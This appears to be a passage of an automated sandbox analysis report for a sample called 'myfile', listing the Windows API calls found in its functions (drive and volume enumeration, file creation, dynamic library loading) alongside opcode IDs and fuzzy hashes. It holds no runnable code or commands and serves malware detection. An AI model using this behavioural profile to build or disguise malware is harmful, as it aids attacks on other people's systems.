                                                                • Instruction ID: 84dd673b5ac3e9753838010647f80ed6767af6ce1a3cce8671009b35a7f07dd4
                                                                • Opcode Fuzzy Hash: 074ea7baa315937fdd0ed04a2045fe966d052ec94a015e682e30bd7881c4d02d
                                                                • Instruction Fuzzy Hash: 7741A376911119BBEB21ABD4EC46FFBB7BCEF08710F144115FA08E2191E7319A348BA0
                                                                APIs
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00272772
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AttributesCreateFileProcess
                                                                • String ID:
                                                                • API String ID: 185973895-0
                                                                • Opcode ID: 3ed19c3cb73488df4080315e67874ebecbd0ab3cdb26c7b54a66b667d6d58f98
                                                                • Instruction ID: b2ad99fa0caf55a493910fea490406a2e06b8ec686510ff5543ba150281dd4c2
                                                                • Opcode Fuzzy Hash: 3ed19c3cb73488df4080315e67874ebecbd0ab3cdb26c7b54a66b667d6d58f98
                                                                • Instruction Fuzzy Hash: BC310772960629BAE711FAB49C42EAFB3ECDF09750F14C029F90CE50C2EB71992547B5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CompletionCurrentOpenQueuedStatus
                                                                • String ID:
                                                                • API String ID: 1990635249-0
                                                                • Opcode ID: 2a1dff0f9394dbbc15121decded440a45611616f5d0c9b8a5c301c0ec584288c
                                                                • Instruction ID: b34c22a557e5187b1151ac55eb17f65518fdf40ef025a37a78c2b47748a694e8
                                                                • Opcode Fuzzy Hash: 2a1dff0f9394dbbc15121decded440a45611616f5d0c9b8a5c301c0ec584288c
                                                                • Instruction Fuzzy Hash: 4011D672931005F6DB36AFA4CD07FAE776CEB11300F10C25AF80C910A1DA729B799A95
                                                                APIs
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                  • Part of subcall function 00274962: GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,00274269,00000000,00000001), ref: 00274985
                                                                • wsprintfW.USER32 ref: 002742D4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$CreateInformationProcessVolumewsprintf
                                                                • String ID:
                                                                • API String ID: 2230357944-0
                                                                • Opcode ID: 1d25b5204dc77f55c9c37ea47734082f9b0fad81b02372b539a838880b76d8a8
                                                                • Instruction ID: ac6328d2db889d622feea6c4ce8ad7c21bcba8c9bacd8a10cb1e6d428a1b51cb
                                                                • Opcode Fuzzy Hash: 1d25b5204dc77f55c9c37ea47734082f9b0fad81b02372b539a838880b76d8a8
                                                                • Instruction Fuzzy Hash: 0301A1B2D5010877D711FBE48C43FEFB76C9B40B00F004052FB08E6082EA715A604BA6
                                                                APIs
                                                                  • Part of subcall function 00273C1E: HeapCreate.KERNEL32(00000000,00100000,00000000,?,00271AA2,?,?,00271AD1), ref: 00273C33
                                                                  • Part of subcall function 00273C1E: GetProcessHeap.KERNEL32(?,00271AA2,?,?,00271AD1), ref: 00273C42
                                                                • GetDriveTypeW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?,?,00272C1F,?,?,?,?,00000000), ref: 0027662A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$CreateDriveProcessType
                                                                • String ID:
                                                                • API String ID: 1501148493-0
                                                                • Opcode ID: e540201912e832a57bf04e5d11cb07d3992e9a30647a0cbc8a010bad09a4eef4
                                                                • Instruction ID: 9c3bc7d7b55e852ada7118ee28ada8c2d33456d98b1fcc3661a9831d4abd1fba
                                                                • Opcode Fuzzy Hash: e540201912e832a57bf04e5d11cb07d3992e9a30647a0cbc8a010bad09a4eef4
                                                                • Instruction Fuzzy Hash: 19012B23970E1266D320BBA4EC07A7F73ACDF01B21F10C92AF55DD54D1E674D96047A5
                                                                APIs
                                                                • RtlGetLastWin32Error.NTDLL ref: 00272DFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastWin32
                                                                • String ID:
                                                                • API String ID: 3973360955-0
                                                                • Opcode ID: de61539c103b9d7c39894770dfaa0fb9375daade9b17d03612672e345f5b6d7c
                                                                • Instruction ID: 1361db9af7ddbd67ca39ce5b5167c15fa013830df1996656645bc6e2aa08d126
                                                                • Opcode Fuzzy Hash: de61539c103b9d7c39894770dfaa0fb9375daade9b17d03612672e345f5b6d7c
                                                                • Instruction Fuzzy Hash: 81014E35521601FBE7346A59DC46FAB739DDB59304F04C429FA0D97181D230AD288B62
                                                                APIs
                                                                  • Part of subcall function 00274C6F: GetWindowsDirectoryW.KERNEL32(00000000,00000000,00000000,0027496C,00000000,00000022,?,00274269,00000000,00000001), ref: 00274C74
                                                                • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000022,?,00274269,00000000,00000001), ref: 00274985
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DirectoryInformationVolumeWindows
                                                                • String ID:
                                                                • API String ID: 3487004747-0
                                                                • Opcode ID: 77806cde273e419cb905f03e627456a9eea617f082d5832ebbbea04a86f23864
                                                                • Instruction ID: 5435464ccba5564e76ec1ccca43e4dacc8a1ecb6de0b52b6cb136ad712644d59
                                                                • Opcode Fuzzy Hash: 77806cde273e419cb905f03e627456a9eea617f082d5832ebbbea04a86f23864
                                                                • Instruction Fuzzy Hash: CFE0ED72936619BBA719EBA4DC4BCBF729CDE01611710825EF809D2100F774AE1056B5
                                                                APIs
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00275C18
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc
                                                                • String ID:
                                                                • API String ID: 190572456-0
                                                                • Opcode ID: 21fd768c35725d10a2b7f4dd4023faef01a752cc2179c73008b5a75aa4e4cfeb
                                                                • Instruction ID: f2c12f0c8315cfe41658043729dbbf268c8c19d763ea0e13b46d625068991db3
                                                                • Opcode Fuzzy Hash: 21fd768c35725d10a2b7f4dd4023faef01a752cc2179c73008b5a75aa4e4cfeb
                                                                • Instruction Fuzzy Hash: 5CF027B2C22718AAD720BBB4DC0EFDBBB9C9B04B10F110466FD0CA2181E7B450508BF1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 3c2f66f3fb323945dc1fde0e4b7676785f64c53ba664f30306766ef4972e7105
                                                                • Instruction ID: 94db8ef872fd75a62e9453c2cfed52cf544c102e370394e3a15c7533e12b95d5
                                                                • Opcode Fuzzy Hash: 3c2f66f3fb323945dc1fde0e4b7676785f64c53ba664f30306766ef4972e7105
                                                                • Instruction Fuzzy Hash: 2FD0C2A2A5430C7EE614F2D9CC03FEE7A5C8B01A10F000196B908A51C2E9B1A61446B2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 592dfce65a311aef70a1d3bafd6c6713436e6fac02f049daf92f3e2a6a1803ec
                                                                • Instruction ID: 9e6b2a3787959d72ae45e086b6fd4389d387ed1f578f606ddcfc7581a8e42195
                                                                • Opcode Fuzzy Hash: 592dfce65a311aef70a1d3bafd6c6713436e6fac02f049daf92f3e2a6a1803ec
                                                                • Instruction Fuzzy Hash: 86D0C26195120C7EE710F2E84C03FBE735C9B40A00F440595B918961C3EAB1562446B2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 178c5f73473477865ab4077a51ca1a8daa3a23bcf15454c67350c0f1217e595e
                                                                • Instruction ID: 069bf9069c31abd1743a7f2a71e8fdd5f516bd21b7205ba241f0f1907d9539df
                                                                • Opcode Fuzzy Hash: 178c5f73473477865ab4077a51ca1a8daa3a23bcf15454c67350c0f1217e595e
                                                                • Instruction Fuzzy Hash: 46D012A6D543083FD611F1E96C03F9D735C8B45A14F404195BD18951C2EAB5572986E2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 595b5928aebc296711383af2edd88baf11a21f24fe86f8fb56f7b7b34a2977e7
                                                                • Instruction ID: a1640fd131c318018f44ea33450a978badabe1c6754c4bd9dd31e7101bf753c3
                                                                • Opcode Fuzzy Hash: 595b5928aebc296711383af2edd88baf11a21f24fe86f8fb56f7b7b34a2977e7
                                                                • Instruction Fuzzy Hash: F0D012A5D543083FD611F1E95C07F9D735C8B41A14F404195BD18951C2EAB1562987E2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: f88e5ce234e4e6ed4436a88c363206cdd2793340e137eced4ccce1cb78417d10
                                                                • Instruction ID: 160c6991be31c9b79ee5ac5e78b4b3d61d925e93f621d3f664ae8e560b8da2a6
                                                                • Opcode Fuzzy Hash: f88e5ce234e4e6ed4436a88c363206cdd2793340e137eced4ccce1cb78417d10
                                                                • Instruction Fuzzy Hash: A4D0C2A1E403083BE610F2E86C03F9D736C8B01B00F404191BD08951C2EAB4572887E2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 30927a0c554b1c22042cca6ccd4cff19bcc73d655b713823da02ff598d41cf29
                                                                • Instruction ID: 37a82090920b7caa8a5c423af6e31a0731769dca071610dc217b7f4e119f39dc
                                                                • Opcode Fuzzy Hash: 30927a0c554b1c22042cca6ccd4cff19bcc73d655b713823da02ff598d41cf29
                                                                • Instruction Fuzzy Hash: F8D012A5E5430C3FD610F5E96C03F9D735C8B41A14F404196BD18951C1EAB156298AF2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 7b045808482fec705c4a8ec2271d275692413c8b91d2baa4882e8edc5fa5c2ae
                                                                • Instruction ID: 260679a5c0fcd9db0f805ef9b2058574f6fda086bb3fb2d9ec9ee6ecd40f2180
                                                                • Opcode Fuzzy Hash: 7b045808482fec705c4a8ec2271d275692413c8b91d2baa4882e8edc5fa5c2ae
                                                                • Instruction Fuzzy Hash: DAD012A5D543087AE610F2E95C07F9D775C8B41B14F404195BD18951C2EAB1562986E2
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: db8c2e2e2faa1a83563e9c191c968d24229a908b8f02e7b241aeca4906b79059
                                                                • Instruction ID: c7fc333dbbf40fd6f789651339962b4c3c81e9da3953d65960a542b0f077f304
                                                                • Opcode Fuzzy Hash: db8c2e2e2faa1a83563e9c191c968d24229a908b8f02e7b241aeca4906b79059
                                                                • Instruction Fuzzy Hash: 83D012A5E5120C3EE620F2E95C03FAD735C9B41B14F4051A5BD18961C6EAB1562586E2
                                                                APIs
                                                                • CreateIoCompletionPort.KERNEL32(?,?,?,00000000,00000000,?,00272EDA,?,?,00000000), ref: 0027604C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CompletionCreatePort
                                                                • String ID:
                                                                • API String ID: 499945625-0
                                                                • Opcode ID: 7d3f6d4cab0c807bffd775a75542b6ee6f78068890d6c50c2f022dec924828d9
                                                                • Instruction ID: 022c0fd00ccac9e38eee6069ec7a9d3dafa388c2361753e4f2b2ba5b56346d95
                                                                • Opcode Fuzzy Hash: 7d3f6d4cab0c807bffd775a75542b6ee6f78068890d6c50c2f022dec924828d9
                                                                • Instruction Fuzzy Hash: 47D0A733104318BFCF045F94EC01AC63BA8EF08A20F008029F51986550D332F810CB80
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,0027356B,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 002764B6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: c1f120f2cd41ddb6c76536f6445e7315841138dafe9452583395f4f9b6792b0c
                                                                • Instruction ID: 2879b80e5ad41f4eca2b19fc4be865cffae5ddd5044c1a237a3461036d701164
                                                                • Opcode Fuzzy Hash: c1f120f2cd41ddb6c76536f6445e7315841138dafe9452583395f4f9b6792b0c
                                                                • Instruction Fuzzy Hash: 2BD09E3214424DBFDF155F90DC06F993F65AF08B60F504514FA25980E0D772D570AB54
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00271AA2,00000008,00000000), ref: 00273BD5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 882596e1e254546ba75ce60d3e72e28ec5ceadc3f5e80d8bf4a9cafe55f22ff6
                                                                • Instruction ID: c2b0e1611a8913ad0553778ae5ac4b6da33c757eab37f86924d3e46646cfc1df
                                                                • Opcode Fuzzy Hash: 882596e1e254546ba75ce60d3e72e28ec5ceadc3f5e80d8bf4a9cafe55f22ff6
                                                                • Instruction Fuzzy Hash: E3C08C36081A0CFFDF105F90FC09BA83BA9EB0072AF40C020FA1C484A1C7729A70AF54
                                                                APIs
                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,0027198F,00000000,00000000,?,00000000,?), ref: 00274574
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                • Associated: 00000000.00000002.2893788364.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893839178.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893862300.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893881571.000000000028E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2893901986.000000000029B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_270000_myfile.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoNativeSystem
                                                                • String ID:
                                                                • API String ID: 1721193555-0
                                                                • Opcode ID: 5a151fc5144b64cc9426ccdfebb620900c3bd9d4fd4c5321784a61785958b89c
                                                                • Instruction ID: 122937e5bc52251212be9de0bf223e1876a88eecaf0fd4b8f958ed8f39ef8190
